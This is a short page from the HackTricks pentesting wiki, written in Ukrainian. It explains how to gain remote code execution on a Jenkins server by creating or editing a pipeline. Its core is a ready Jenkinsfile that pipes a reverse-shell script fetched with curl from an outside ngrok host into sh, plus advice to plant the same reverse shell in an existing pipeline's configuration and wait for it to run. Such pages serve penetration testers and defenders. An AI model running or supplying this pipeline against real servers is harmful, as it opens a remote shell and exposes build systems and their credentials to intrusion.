Jenkins RCE Creating/Modifying Pipeline

Support HackTricks

Створення нового Pipeline

У "New Item" (доступно за адресою /view/all/newJob) виберіть Pipeline:

У Pipeline section напишіть reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Нарешті натисніть Зберегти, а потім Запустити зараз, і конвеєр буде виконано:

Модифікація конвеєра

Якщо ви можете отримати доступ до конфігураційного файлу деякого налаштованого конвеєра, ви можете просто модифікувати його, додавши ваш реверсний шелл, а потім виконати його або дочекатися, поки його виконають.

Підтримайте HackTricks

Last updated